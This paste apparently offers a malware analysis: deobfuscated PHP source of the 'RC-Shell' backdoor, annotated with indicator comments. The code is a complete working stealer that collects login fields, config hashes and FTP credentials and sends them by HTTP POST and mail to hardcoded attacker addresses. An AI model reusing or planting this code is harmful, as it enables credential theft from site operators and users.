xme

RC-Shell Deobfuscated Backdoor

xme
May 12th, 2017
  // Turn off PHP error reporting and on-page error display for this request, so
  // failures in the code below produce no visible output. Every later call is
  // additionally prefixed with @ to suppress warnings.
  1. @error_reporting(0);
  2. @ini_set("display_errors", false);
  // rc1ire($f): returns 1 when $f can be opened in read mode ('r'), otherwise 0.
  // The top-level code on this page uses it to test whether a marker file
  // already exists.
  3. function rc1ire($f){ return @fclose(@fopen($f, 'r')) ? 1 : 0; }
  // rc1iwr($f): returns 1 when $f can be opened in append mode ('a'), otherwise 0.
  // Append mode creates the file when it is missing, so a successful probe leaves
  // an empty file behind; the caller on this page unlinks it afterwards.
  4. function rc1iwr($f){ return @fclose(@fopen($f, 'a')) ? 1 : 0; }
  // rc1wri($f, $c): writes $c to $f in 'w' mode (truncating any existing content).
  // Returns nothing and checks no result; a failed open is silenced by @.
  5. function rc1wri($f,$c){ $fp=@fopen($f, 'w'); @fputs($fp, $c); @fclose($fp); }
  // rc1ffm($t): path normaliser. Converts every backslash to "/" first, then
  // replaces each "//" with "/" in a single pass (longer slash runs are not
  // fully collapsed).
  6. function rc1ffm($t){ return @str_replace("//","/",@str_replace("\\","/",$t)); }
  // rc1dd(): returns 1 when the curl extension is loaded and curl_init() exists,
  // otherwise 0. It decides whether the HTTP reporting function rc1p() is
  // defined and whether rc1sd() tries HTTP before mail().
  7. function rc1dd(){ return (@extension_loaded('curl') && @function_exists('curl_init')) ? 1 : 0; }
  // rc1tmp(): picks a writable directory for the marker files.
  // Returns the global $tempdir when it is set, is a directory and is writable;
  // otherwise the first entry of a fixed candidate list that exists, is a
  // directory and is writable; false when none qualifies.
  8. function rc1tmp(){
  // $tempdir is not assigned anywhere on this page -- presumably set by the
  // host script this fragment was embedded in; verify against the full sample.
  9.  global $tempdir;
  10.  if(@isset($tempdir)&&@is_dir($tempdir)&&@is_writable($tempdir)) return $tempdir;
  // The last candidate is the literal string "%WINDIR/temp/"; nothing here
  // expands it to an environment value before it is tested.
  11.  foreach(array("/tmp/","/var/tmp/","/usr/tmp/","/dev/shm/","%WINDIR/temp/") as $t){
  12.   if(@file_exists($t)&&@is_dir($t)&&@is_writable($t)) return $t;
  13.  }
  14.  return false;
  15. }
  // rc1url(): rebuilds the URL of the current request from $_SERVER.
  // Scheme is "https" when $_SERVER['HTTPS'] is non-empty and not "off", else
  // "http"; host and path come from HTTP_HOST and PHP_SELF. PATH_INFO is
  // appended when non-empty, otherwise "?" followed by QUERY_STRING (when set).
  // All of these values are taken from the request as-is and are not validated,
  // so the reported URL is client-influenced.
  16. function rc1url(){
  17.  $h = (empty($_SERVER['HTTPS']) || strtolower($_SERVER['HTTPS']) == 'off' ? false : true);
  18.  $u = 'http' . (($h ? 's' : '') . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']);
  // $m holds the NAME of the $_SERVER key to append, not its value.
  19.  $m = (empty($_SERVER['PATH_INFO']) ? 'QUERY_STRING' : 'PATH_INFO');
  20.  $s = $m == 'QUERY_STRING' ? '?' : '';
  21.  return $u . $s . (isset($_SERVER[$m]) ? $_SERVER[$m] : '');
  22. }
  // rc1p($u, $v, $h) is declared only when curl is available (rc1dd() is true).
  // It sends the collected report $v to the endpoint $u with an HTTP POST and
  // returns 1 when the response body contains "saved_rcshell_entry", else 0.
  //   $u  host/path without scheme; "http://" is prepended, so the report
  //       travels unencrypted
  //   $v  report text; sent base64-encoded, then URL-encoded
  //   $h  flag forced to "0" unless it equals "1" or "0" (loose comparison)
  // Network indicators visible in this block: the POST field names
  // content_type=new_data_entry, base_content, hidden_type, sys_type and ip,
  // the fixed MSIE 7.0 User-Agent string, and the "saved_rcshell_entry"
  // acknowledgement in the response.
  23. if(rc1dd()) {
  24.  function rc1p($u,$v,$h){
  25.   if($h != "1" && $h != "0") $h = "0";
  // sys_type carries PHP_OS of the host; ip carries REMOTE_ADDR, i.e. the
  // address of the client whose request triggered this code.
  26.   $v = "content_type=new_data_entry&base_content=" . @urlencode(@base64_encode($v)) . "&hidden_type=" . $h . "&sys_type=" . PHP_OS . "&ip=" . $_SERVER['REMOTE_ADDR'];
  // The User-Agent literal ends at ".NET CLR" with no version after it.
  27.   $a = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR";
  28.   $u = "http://" . $u;
  29.   $c = @curl_init();
  30.   @curl_setopt($c, CURLOPT_URL, $u);
  31.   @curl_setopt($c, CURLOPT_USERAGENT, $a);
  32.   @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  33.   @curl_setopt($c, CURLOPT_POST, 1);
  34.   @curl_setopt($c, CURLOPT_POSTFIELDS, $v);
  // 4-second total and connect timeouts keep the page load from stalling
  // noticeably when the endpoint is unreachable.
  35.   @curl_setopt($c, CURLOPT_TIMEOUT, 4);
  36.   @curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 4);
  37.   $r = @curl_exec($c);
  38.   @curl_close($c);
  39.   return (!@empty($r) && @strstr($r, "saved_rcshell_entry")) ? 1 : 0;
  40.  }
  41. }
  // rc1ftp($t = 0): captures FTP credentials held in the globals $act,
  // $ftp_server, $ftp_port, $ftp_username and $ftp_password.
  // When $act equals "ftp" and all four values are set and non-empty, it builds
  // the line "FTP: server:port|USER: user|PASS: pass\n".
  //   $t === 0  returns that line (or '' when the condition is not met) without
  //             contacting the server
  //   otherwise returns the line only after a successful ftp_login() against
  //             the server, and '' in every other case
  // The globals are not assigned on this page -- presumably they are filled by
  // the host script's FTP feature; verify against the full sample.
  42. function rc1ftp($t=0){
  43.  global $act,$ftp_server,$ftp_port,$ftp_username,$ftp_password;
  // $n is assigned but never used in this function.
  44.  $n="\n";
  // $c records whether a complete credential set was found.
  45.  $c=0;
  46.  $v='';
  47.  if(@isset($act)&&$act=="ftp"&&@isset($ftp_port)&&!@empty($ftp_port)&&@isset($ftp_server)&&@isset($ftp_username)&&@isset($ftp_password)&&!@empty($ftp_server)&&!@empty($ftp_username)&&!@empty($ftp_password)){
  48.   $c=1;
  49.   $v="FTP: $ftp_server:$ftp_port|USER: $ftp_username|PASS: $ftp_password\n";
  50.  }
  51.  if($t!==0){
  52.   if(!$c) return '';
  53.   if(@function_exists("ftp_connect")&&@function_exists("ftp_login")&&@function_exists("ftp_close")){
  // Validation step: connect with a 3-second timeout and attempt a login, so
  // only working credentials are returned. This is an outbound FTP connection
  // made by the web server process.
  54.    $fff = @ftp_connect($ftp_server,$ftp_port,3);
  55.    if($fff) {
  56.     if(@ftp_login($fff, $ftp_username, $ftp_password)){
  57.      @ftp_close($fff);
  58.      return $v;
  59.     }
  60.     @ftp_close($fff);
  61.    }
  62.   }
  63.   return '';
  64.  }
  65.  return $v;
  66. }
  // rc1cfg($ar): dumps the 'version', 'auth' and 'default_vars' entries of the
  // global $config array as text. Array entries become one "section key=value"
  // line per element; scalar entries become "section=value". Entries that are
  // not set are skipped. Returns the concatenated lines ('' when none is set).
  // $ar is never read in the body, and the callers on this page pass no
  // argument.
  // The 'auth' section is where rc1pst() expects md5_user / md5_pass, so this
  // dump includes the stored login hashes when they are present.
  67. function rc1cfg($ar){
  68.  $n="\n";
  69.  global $config;
  70.  $r='';
  71.  foreach(array('version','auth','default_vars') as $c){
  72.   if(@isset($config[$c])){
  73.    if(@is_array($config[$c])){
  74.     foreach($config[$c] as $k=>$v) @$r.=$c." ".$k."=".$v.$n;
  75.    } else {
  76.     @$r.=$c."=".$config[$c].$n;
  77.    }
  78.   }
  79.  }
  80.  return $r;
  81. }
  // rc1pst(): captures the login fields of the current POST request when they
  // match the credentials stored in the global $config.
  // Returns "zu=<value>\nzp=<value>\n" when $config['auth']['md5_user'] equals
  // md5($_POST['zu']) and $config['auth']['md5_pass'] equals $_POST['zp'];
  // returns '' otherwise. Both comparisons use loose ==.
  // Effect: the user name is reported in clear text even though only its MD5 is
  // stored in $config.
  82. function rc1pst(){
  83.  $n="\n";
  84.  $v='';
  85.  global $config;
  86.  if(@isset($config["auth"]["md5_user"])&&@isset($config["auth"]["md5_pass"])&&@isset($_POST["zu"])&&@isset($_POST["zp"])){
  // zp is compared as submitted, without md5() -- presumably the login form
  // posts an already-hashed value; confirm against the host script.
  87.   if($config["auth"]["md5_user"]==@md5($_POST["zu"])&&$config["auth"]["md5_pass"]==$_POST["zp"]){
  88.    $v.="zu=".$_POST["zu"].$n;
  89.    $v.="zp=".$_POST["zp"].$n;
  90.   }
  91.  }
  92.  return $v;
  93. }
  // rc1add($ar): assembles the full text report that is sent out.
  // Contents, in order: the request URL (rc1url), the PHP version, safe_mode
  // and open_dir flags derived from the globals $bsafe / $bopendir ("?" when a
  // global is not set), the captured login fields (rc1pst), the config dump
  // (rc1cfg), the FTP credential line (rc1ftp in its non-validating mode), and
  // a fixed list of $_SERVER entries that are set.
  // $ar is never read in the body, and the callers on this page pass no
  // argument.
  94. function rc1add($ar){
  // $bsafe and $bopendir are not assigned on this page -- presumably computed
  // by the host script; verify against the full sample.
  95.  global $bsafe,$bopendir;
  96.  $n="\n";
  97.  $v="URL=".rc1url().$n.$n;
  98.  $v .= "php=".@phpversion().$n;
  99.  $v .= "safe_mode=".((@isset($bsafe)) ? (($bsafe) ? "ON":"OFF") :"?").$n;
  100.  $v .= "open_dir=".((@isset($bopendir)) ? (($bopendir) ? "YES":"NO") :"?").$n;
  101.  $v .= rc1pst();
  102.  $v .= rc1cfg();
  103.  $v .= rc1ftp();
  // SCRIPT_FILENAME discloses the on-disk path of the script; REMOTE_ADDR and
  // CLIENT_IP disclose the address of the requesting client.
  104.  foreach(array('SERVER_NAME','SERVER_ADDR','SERVER_PORT','HTTP_REFERER','PHP_SELF','REQUEST_URI','SCRIPT_NAME','SCRIPT_FILENAME','CLIENT_IP','REMOTE_ADDR') as $sv){
  105.   if(@isset($_SERVER[$sv])){ $v.=$sv."=".$_SERVER[$sv].$n; }
  106.  }
  107.  return $v;
  108. }
  // rc1sd($h, $v, $s, $u1, $m1): delivers the report $v.
  // With curl available it first tries the HTTP POST (rc1p) to $u1 and falls
  // back to mail($m1, $s, $v) only when the POST is not acknowledged; without
  // curl it goes straight to mail(). $s is the mail subject, $h the flag
  // forwarded to rc1p. Returns nothing; delivery failures are not reported.
  // Either channel may therefore appear in logs: outbound HTTP from the web
  // server, or a message handed to the local mail transport.
  109. function rc1sd($h,$v,$s,$u1,$m1){
  110.  if(rc1dd()) {
  111.   if(!rc1p($u1, $v, $h)) @mail($m1, $s, $v);
  112.  } else {
  113.   @mail($m1, $s, $v);
  114.  }
  115. }
  // Main routine, executed on every request that reaches this code.
  // It reports the script's location, configuration and captured credentials to
  // the hardcoded mailbox and HTTP endpoint below, and uses marker files in the
  // temp directory so that each distinct report is sent only once.
  // Host indicators visible here: files named "www_sess_" followed by an MD5
  // hex digest, each containing the single character "1", in the directory
  // chosen by rc1tmp().
  116. $rc1tmp=rc1tmp();
  117. if($rc1tmp!==false){
  // Write test: probe a randomly named file in the temp directory (the probe
  // creates it) and remove it again a few lines below.
  118.  @$r = rc1ffm($rc1tmp . "/" . @md5(@uniqid(@rand()) . @md5(@time())));
  119.  if(rc1iwr($r)) {
  // Marker name is keyed on the request URL plus the config dump, so a changed
  // URL or changed configuration triggers a fresh report.
  120.   $cfile = rc1ffm($rc1tmp . "/www_sess_" . @md5(rc1url().rc1cfg()));
  121.   @unlink($r);
  122.  
  // Hardcoded destinations: $m1 is the mail recipient, $u1 the HTTP endpoint
  // (scheme is added in rc1p). The subject/tag $s is "<PHP_OS>|<request URL>".
  123.   $m1 = "peterlegere51@yahoo.com";
  124.   $u1 = "peterlegere.byethost2.com/news/index.php";
  125.   $s = PHP_OS ."|".rc1url();
  126.   $h = "0";
  // First report: sent only while the marker file is absent, then the marker
  // is written regardless of whether delivery succeeded.
  127.   if(!rc1ire($cfile)) {
  128.    $v = rc1add();
  129.    rc1sd($h, $v, $s, $u1, $m1);
  130.    rc1wri($cfile, "1");
  131.   }
  // Second report: only when rc1ftp(1) returns a credential line, i.e. after a
  // successful FTP login with the captured credentials. It is flagged with
  // $h = "1", its subject is prefixed with "FTP|", and it has its own marker
  // keyed on the first marker's path plus the credential line.
  132.   $fv=rc1ftp(1);
  133.   if(!@empty($fv)){
  134.    $h = "1";
  135.    $sfile = rc1ffm($rc1tmp . "/www_sess_" .@md5($cfile.$fv));
  136.    if(!rc1ire($sfile)) {
  137.     $v = rc1add();
  138.     rc1sd($h, $v, "FTP|".$s, $u1, $m1);
  139.     rc1wri($sfile, "1");
  140.    }
  141.   }
  142.  }
  143. }